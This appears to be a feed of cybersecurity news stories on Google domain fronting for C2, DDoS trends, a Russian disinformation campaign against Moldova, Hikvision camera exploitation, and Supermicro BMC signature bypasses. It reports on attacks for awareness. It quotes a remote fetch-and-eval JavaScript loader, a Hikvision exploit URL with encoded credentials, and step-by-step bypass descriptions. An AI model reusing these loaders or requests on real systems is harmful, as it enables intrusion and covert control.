• Organizations commonly allow traffic to core services like Google Meet, YouTube, Chrome update servers, and Google Cloud Platform (GCP) to ensure uninterrupted operations. 

    A newly demonstrated domain fronting technique weaponizes this trust to establish covert command-and-control (C2) channels, enabling attackers to tunnel malicious traffic through Google’s own infrastructure without raising suspicion.

    Domain Fronting Technique

    Praetorian reports that domain fronting exploits the discrepancy between the TLS Server Name Indication (SNI) and the HTTP Host header. In a standard HTTPS handshake, the client presents the SNI in cleartext, for example:

    New Domain Fronting Attack

    Once the TLS tunnel is established, the HTTP Host header inside the encrypted request can specify an entirely different domain:

    New Domain Fronting Attack

    By routing through Google’s front-end servers, adversaries can connect to meet.google.com, youtube.com, update.googleapis.com, or even GCP endpoints, while backend routing diverts traffic to attacker-controlled infrastructure hosted on Google Cloud Run or App Engine. 

    Google.com Domain Fronting
    Google[.]com Domain Fronting

    To network monitors, the packets appear indistinguishable from legitimate Google usage, blending malicious C2 with normal enterprise traffic.

    Researchers created a simple Cloud Run function returning “Hello World!” and inserted its URL in the Host header when connecting to google.com. 

    Domain Fronting Across Google Services
    Domain Fronting Across Google Services

    Unexpectedly, the Cloud Run function was invoked, confirming that the request had been routed to attacker infrastructure rather than Google’s public web servers. This edge-case behavior extends across multiple Google domains, including:

    • update.googleapis.com
    • payments.google.com
    • api.snapchat.com (leveraging Google App Engine)

    Because these domains are often excluded from TLS inspection due to certificate pinning or classification as financial or healthcare services, security appliances rarely inspect or block them, granting attackers near-total invisibility.

    Historically, major providers blocked domain fronting by enforcing SNI and Host header consistency. 

    However, Google’s internal load-balancer routing logic still allows mismatches in specific services, creating an unintentional fronting vector. The attack sequence is as follows:

    Initiate a TLS handshake with SNI set to a high-reputation Google domain (e.g., youtube.com). Within the encrypted request, set the Host header to the C2 domain hosted on Cloud Run or App Engine.

    Google’s front-end accepts the SNI, terminates TLS, and routes the decrypted HTTP request to backend infrastructure based on the Host header. The attacker’s backend handles the request, enabling bidirectional tunneling through standard HTTPS.

    A redirector tool, praetorian-inc/google-redirector, automates setup for red team engagements. Deploying this redirector alongside existing implants allows seamless HTTP-based C2 over Google’s highly trusted channels.

    This technique revives the power of domain fronting within Google’s ecosystem, presenting defenders with a formidable challenge: blocking malicious C2 without disrupting essential business services. 

    Vigilance demands enhanced detection strategies, such as certificate consistency checks, analysis of abnormal traffic patterns, and strict host validation at the enterprise perimeter. 

    As attackers turn the Internet’s backbone into their covert pipeline, defenders must adapt to identify hidden threats that are hiding in plain sight.

    Follow us on Google News, LinkedIn, and X for daily cybersecurity updates. Contact us to feature your stories.

    The post New Domain-fronting Attack Uses Google Meet, YouTube, Chrome and GCP to Tunnel Traffic appeared first on Cyber Security News.

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

  • Luxembourg, Luxembourg, September 25th, 2025, CyberNewsWire

    Gcore, the global edge AI, cloud, network, and security solutions provider, today announced the findings of its Q1-Q2 2025 Radar report into DDoS attack trends. DDoS attacks have reached unprecedented scale and disruption in 2025, and businesses need to act fast to protect themselves from this evolving threat. The report reveals a significant escalation in the total number of DDoS attacks and their magnitude, measured in terabits per second (Tbps).

    It also highlights a clear shift: attackers are growing more strategic, blending brute-force volume with precise application-layer manipulation.

    Key Insights From Q1-Q2 2025

    ·      Attack volumes increased by 41% compared to Q1-Q2 2024, evidencing dangerous long term growth trends predicted in prior Radar reports.

    ·      The largest attack peaked at 2.2 Tbps in Q1-Q2, surpassing the 2 Tbps peak recorded in late 2024.

    ·      DDoS attacks are becoming longer in duration but more harmful.

    ·      Attackers are shifting focus to financial services and tech, with tech overtaking gaming as the most targeted sector.

    ·      DDoS attacks at the application layer have increased by 10% from Q3-Q4 2024 to Q1-Q2 2025.

    ·      The total number of DDoS attacks climbed from 969,000 in H2 2024 to 1.17 million in H1 2025.

    Andrey Slastenov, Head of Security at Gcore, commented: “The latest Gcore Radar should be a wake-up call to businesses across all industries. Not only are the number and intensity of attacks increasing, but attackers are expanding the scope of their attacks to reach an increasingly wide range of sectors. Businesses must invest in robust DDoS detection, mitigation, and protection to prevent the financial and reputational impact of an attack.’’

    Recent Data Shows Shift Toward Longer Sustained Assaults

    Attacks shorter than 10 minutes have decreased by about 33%, while those lasting between 10 and 30 minutes have nearly quadrupled. While previous reports highlighted the dominance of very short, intense DDoS attacks, this change indicates that attackers are adapting to the improved automatic detection and mitigation systems employed by companies to handle brief attacks. By extending attack durations, threat actors can circumvent these temporary defense thresholds, cause more extensive damage, and test infrastructure resilience over time.

    Multi-vector attacks have also increasingly become a preferred tactic of attackers. By masking malicious activity within seemingly legitimate traffic, attackers complicate detection and extend their window to cause damage. This shift toward more sophisticated attacks underscores the need for an equally layered defense approach that anticipates attacker strategies and protects critical digital assets holistically.

    Data Indicates Rise in Attacks on Vulnerable Sectors

    Gaming is no longer the dominant target it once was. Its share of total DDoS attacks has dropped significantly (30% in the last year). This notable decline suggests attackers are shifting focus to other sectors such as tech (attacks increased by 15%) and financial services (attacks increased by 15%). These sectors are favored targets because they may be less protected against threat actors and have higher disruption potential.

    The Domino Effect of Cyberattacks

    Hosting providers, in particular, have become prime targets due to their role supporting SaaS, e-commerce, gaming, and financial clients. An attack on one hosting provider can have dangerous ripple effects: massive service outages and reputation damage to dozens of dependent companies.

    Geographical Distribution of DDoS Attacks

    With a presence that spans six continents, Gcore can accurately track the geographical sources of DDoS attacks. Gcore derives these insights from the attackers’ IP addresses and the geographic locations of the data centers where malicious traffic is targeted.

    Although the United States and the Netherlands remain top sources for attacks (as found in previous Radar reports), Hong Kong is a new source of threats. Hong Kong now accounts for 17% of all network-layer and 10% of application-layer attacks. These findings indicate that attackers are expanding into emerging areas, highlighting the need for proactive and adaptive defenses across diverse regions.

    Emerging Origins of Attacks

    The rapid increase in application layer attacks (28% to 38% from Q3-Q4 2024 to Q1-Q2 2025) also reveals an overall trend toward multi-layered attacks targeting web application and API vulnerabilities, which particularly impact sectors with a high degree of customer interaction (ranging from e-commerce and online banking to logistics and public services).

    To access the full report, please visit: https://gcore.com/resources/gcore-radar-attack-trends-q1-q2-2025

    About Gcore

    Gcore is a global edge AI, cloud, network, and security solutions provider. Headquartered in Luxembourg, with a team of 600 operating from ten offices worldwide, Gcore provides solutions to global leaders in numerous industries. Gcore manages its global IT infrastructure across six continents, with one of the best network performances in Europe, Africa, and LATAM due to the average response time of 30 ms worldwide. Gcore’s network consists of 210 points of presence worldwide in reliable Tier IV and Tier III data centers, with a total network capacity exceeding 200 Tbps.

    Further information is available at gcore.com and updates are also shared on LinkedIn, Twitter, and Facebook.

    Gcore Press Contact   

    pr@gcore.com 

    PR Agency Contact  

    gcore@aspectusgroup.com

    Contact

    Ms.

    Kira Kurepina

    Gcore

    kira.kurepina@gcore.com

    The post Gcore Radar Report Reveals 41% Surge in DDoS Attack Volumes appeared first on Cyber Security News.

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

  • Gcore, the global edge AI, cloud, network, and security solutions provider, today announced the findings of its Q1-Q2 2025 Radar report into DDoS attack trends. DDoS attacks have reached unprecedented scale and disruption in 2025, and businesses need to act fast to protect themselves from this evolving threat. The report reveals a significant escalation in […]

    The post Gcore Radar Report Reveals 41% Surge in DDoS Attack Volumes appeared first on GBHackers Security | #1 Globally Trusted Cyber Security News Platform.

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

  • On the eve of Moldova’s parliamentary elections scheduled for September 28, 2025, cybersecurity researchers have uncovered a sophisticated Russian-backed disinformation campaign designed to undermine public confidence in Moldova’s pro-European leadership.

    The campaign began surfacing in April 2025, when analysts first observed a cluster of newly registered domains publishing biased news articles in both Romanian and Russian.

    These websites employed identical templates and shared infrastructure with older Russian propaganda outlets, signaling an orchestrated effort to sow discord at a critical juncture in Moldova’s democratic process.

    Silent Push analysts identified the campaign through a combination of open-source intelligence and network traffic analysis.

    Initial indicators included dozens of URLs hosting political commentary with inflammatory headlines aimed at discrediting the ruling coalition and amplifying calls to pivot back toward Moscow.

    Subsequent investigations revealed that these domains resolved to two dedicated IP addresses, both of which had previously hosted content for a 2022 disinformation operation known as Absatz.

    By correlating registration metadata and hosting records, researchers established a clear lineage between the new Moldovan targeting effort and earlier campaigns.

    Through deep technical analysis, Silent Push analysts noted that the new sites reused several bespoke functions originally developed for the 2022 effort.

    These functions handled content generation, automatic comment moderation, and stealthy redirection of social-media referrals.

    Reusing this code not only accelerated deployment but also provided a unique fingerprint enabling researchers to connect the disparate sites.

    The technical footprint was especially evident in the PHP module responsible for article templating and URL parameter parsing, which contained the following identifiable snippet:-

    [? php
    function renderStory($ storyId) {
        $ seed = 'Storm1679';
        $ key = substr (md5($ storyId . $ seed), 0, 8);
        $ templatePath = "/var /www /html /templates /{$ key}_template[.]php";
        include($ templatePath);
    }
    ?]

    By comparing hash fragments in each URL, analysts could trace the evolution of the codebase across both the 2022 Absatz infrastructure and the 2025 Moldovan campaign.

    Detection Evasion and Infrastructure Persistence

    The campaign’s operators demonstrated advanced persistence tactics, carefully architecting their infrastructure to evade conventional detection.

    Each disinformation website employed a rotating pool of content delivery networks (CDNs) and proxy services to mask origin IPs, falling back to hard-coded backup hosts when a primary node was taken offline.

    DNS records were configured with extremely short TTL values—often under five minutes—forcing security teams to constantly refresh caches and complicating takedown efforts.

    In one instance, when researchers successfully blocked access to a malicious domain at the ISP level, the site automatically redirected visitors to an alternate domain using a stealth JavaScript loader:

    [script]
      fetch('https://cdn.cloudproxy[.]net/get?siteId=42')
        . then (res =() res[.]text())
        . then (code =() eval (code));
    [/script]

    This loader fetched an obfuscated payload from a third-party CDN, which in turn rehydrated the disinformation site content in the user’s browser without touching the original domain.

    By leveraging this dual-stage loading mechanism, the campaign could survive domain blacklisting and continue publishing articles without significant downtime.

    To maintain operational security, all command-and-control interactions for new content updates were conducted over TLS-encrypted channels using non-standard ports.

    The same ports had been observed in the 2022 Absatz campaign, further cementing the link between the two efforts.

    Analysts also noted that social-media amplification relied on low-quality bot accounts programmed to mimic genuine user behavior by varying posting times and interleaving political content with neutral topics like sports or local weather.

    As Moldova approaches the polls, this campaign underscores the importance of technical collaboration and real-time monitoring to defend democratic institutions from covert influence operations.

    Silent Push continues to track and mitigate the evolving infrastructure behind the Storm-1679 network, with detailed telemetry available to enterprise customers for proactive defense measures.

    Follow us on Google NewsLinkedIn, and X to Get More Instant UpdatesSet CSN as a Preferred Source in Google.

    The post New Russian Disinformation Campaign Targeting Upcoming Moldova’s Elections appeared first on Cyber Security News.

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

  • In a recently observed campaign emerging from Israel, threat actors have revived the use of Windows shortcut (.LNK) files to deliver a potent Remote Access Trojan (RAT). These seemingly innocuous shortcut files exploit Living-off-the-Land Binaries (LOLBins) such as odbcconf.exe to silently register and execute malicious DLLs, evading security tools and complicating detection efforts. The attack […]

    The post LNK Malware Leverages Legit Windows Files to Slip Past Defenses appeared first on GBHackers Security | #1 Globally Trusted Cyber Security News Platform.

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

  • Security researchers have observed renewed exploit campaigns targeting an eight-year-old backdoor in Hikvision cameras to harvest configuration files, user lists, and snapshots. Attackers automate scans across IP ranges, appending a base64-encoded “auth” parameter to management URLs. When decoded, the string commonly reveals “admin:11,” enabling unauthorized access. Organizations relying on older camera firmware are at heightened […]

    The post Hackers Exploit Hikvision Camera Flaw to Steal Sensitive Data appeared first on GBHackers Security | #1 Globally Trusted Cyber Security News Platform.

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

  • Cisco has warned of a high-severity security flaw in IOS Software and IOS XE Software that could allow a remote attacker to execute arbitrary code or trigger a denial-of-service (DoS) condition under specific circumstances. The company said the vulnerability, CVE-2025-20352 (CVSS score: 7.7), has been exploited in the wild, adding it became aware of it “after local Administrator credentials were

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

  • Persistent, stealthy, and cross-platform, the BRICKSTORM backdoor has emerged as a significant threat to U.S. technology and legal organizations. Tracked by Google Threat Intelligence Group (GTIG) and investigated by Mandiant Consulting, BRICKSTORM campaigns have maintained undetected access for an average of 393 days, targeting legal services firms, SaaS providers, BPOs, and technology companies to harvest […]

    The post BRICKSTORM Backdoor Hits Tech and Legal Firms with Stealthy New Campaign appeared first on GBHackers Security | #1 Globally Trusted Cyber Security News Platform.

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

  • A critical vulnerability in Hikvision security cameras, first disclosed in 2017, is being actively exploited by hackers to gain unauthorized access to sensitive information.

    SANS researchers observed a recent surge in malicious activity targeting a specific flaw, identified as CVE-2017-7921, which carries a critical severity score of 10.0 on the CVSS scale.

    The exploit attempts are characterized by suspicious web requests to specific URLs on vulnerable cameras, such as /System/deviceInfo?auth=YWRtaW46MTEK.

    The base64 encoded string in the request YWRtaW46MTEK, decodes to admin:11. This suggests that attackers are not using a sophisticated backdoor but are rather attempting to brute-force devices with weak and easily guessable passwords.

    Hikvision Camera Vulnerability Exploited

    The core of the issue lies in a vulnerability in the firmware of numerous Hikvision camera models that allows improper authentication. This flaw allows a remote, unauthenticated attacker to bypass security measures and escalate their privileges, effectively gaining control over the device.

    By sending a specially crafted request, an attacker can download the camera’s configuration file, which may contain user credentials, or even change user passwords to lock out legitimate owners.

    While Hikvision has released firmware patches to address this vulnerability, hundreds of thousands of devices remain unpatched and exposed on the internet.

    The problem is compounded by the fact that many other manufacturers rebrand and sell Hikvision cameras under their own names, making it difficult for users to identify if their devices are affected.

    A successful exploit can have severe consequences. Attackers can not only view live and recorded footage but also use the compromised camera as a pivot point to launch further attacks against the internal network.

    The downloaded configuration files, though encrypted, use weak encryption with a static key, making it possible for attackers to decrypt them and harvest user credentials.

    The current wave of attacks appears to be taking advantage of poor security practices by users. The use of a simple password like “11” may be due to the limited user interface on some Hikvision DVRs, which often feature only a numeric on-screen keyboard, making it cumbersome to enter complex alphanumeric passwords.

    While placing credentials in a URL is discouraged due to the risk of them being logged, it is a convenient feature that allows for creating direct login links.

    To mitigate the risk, owners of Hikvision cameras are strongly advised to update their devices’ firmware to the latest version. It is also crucial to use strong, unique passwords and to avoid exposing the camera’s management interface directly to the internet.

    If remote access is necessary, it should be done through a secure VPN connection.

    Follow us on Google News, LinkedIn, and X for daily cybersecurity updates. Contact us to feature your stories.

    The post Hackers Exploiting Hikvision Camera Vulnerability to Access Sensitive Information appeared first on Cyber Security News.

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

  • Critical vulnerabilities discovered in Supermicro Baseboard Management Controller (BMC) firmware have exposed a troubling pattern where inadequate security fixes create new attack vectors, allowing sophisticated adversaries to bypass signature verification mechanisms and maintain persistent control over enterprise server infrastructure.

    These flaws, affecting multiple generations of Supermicro motherboards, demonstrate how design weaknesses in firmware validation processes can undermine the fundamental security assumptions of server hardware.

    The vulnerabilities emerged following an investigation into supposedly fixed security issues, revealing that vendor patches implemented in January 2025 were insufficient to address the underlying authentication flaws.

    The original vulnerability, CVE-2024-10237, was discovered by NVIDIA’s Offensive Security Research Team and involved fundamental flaws in BMC firmware image authentication design that could allow attackers with administrative access to upload malicious firmware updates.

    Binarly analysts identified a bypass technique for the vendor’s CVE-2024-10237 fix, resulting in the assignment of CVE-2025-7937.

    During their extended analysis of different Supermicro products, researchers discovered a similar vulnerability employing distinct exploitation techniques, assigned CVE-2025-6198.

    The exploitation of this second vulnerability revealed capabilities extending beyond mere firmware updates, enabling attackers to bypass the BMC Root of Trust (RoT) security feature entirely.

    Supermicro BMC validation process (Source – Binarly)

    The attack vectors leverage design flaws in the three-step firmware validation process used across Supermicro’s BMC implementations.

    Initially, the system retrieves a public key from the BMC SPI flash chip forming part of the currently running firmware, while extracting cryptographic signature values from uploaded image blobs using RSA-4096 verification.

    The process then analyzes embedded tables representing different firmware regions, calculating SHA-512 hash digests of signed regions before verifying signatures against calculated digests.

    These vulnerabilities grant attackers complete persistent control over both BMC systems and main server operating systems, representing a critical escalation pathway that compromises fundamental hardware security assumptions in enterprise environments.

    Exploitation Mechanisms and Signature Bypass Techniques

    The bypass techniques exploit fundamental weaknesses in how firmware validation logic processes region tables embedded within uploaded images.

    For CVE-2025-7937, attackers circumvent the supposed fixes by introducing custom fwmap tables before original ones, containing single elements that encompass all signed regions concatenated together.

    Exploitation for this firmware (Source – Binarly)

    The exploit leverages the fact that fwmap tables are located in memory by signature rather than fixed positions, allowing manipulation of the validation sequence.

    In the X12STW-F firmware version 01.06.17, the original validation process defines six distinct regions with specific offsets and signing requirements.

    The bypass technique creates a consolidated entry at offset 0x100000 with size 0x2b32c00 marked as signed boot content, effectively wrapping all legitimate signed regions into a single validated block while inserting malicious content in the bootloader space.

    For CVE-2025-6198, the exploitation technique targets the auth_bmc_sig function within the OP-TEE environment, manipulating the sig_table section located at offset 0x100000.

    This alternative validation method processes region information differently, storing offsets in the first four bytes and custom-transformed size values in remaining bytes.

    By modifying kernel regions and updating corresponding sig_table entries, attackers maintain signature validity while executing arbitrary code during BMC boot processes.

    The successful exploitation of these techniques results in persistent arbitrary code execution capabilities, with modified kernel images bypassing authentication mechanisms during boot sequences.

    Binarly researchers demonstrated successful validation and flashing of modified images through UART debugging interfaces, confirming that customized kernels execute without triggering security mechanisms, effectively compromising the entire BMC security model.

    Follow us on Google NewsLinkedIn, and X to Get More Instant UpdatesSet CSN as a Preferred Source in Google.

    The post BMC Firmware Vulnerabilities Allow Attackers to Bypass Signature Verification Features appeared first on Cyber Security News.

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶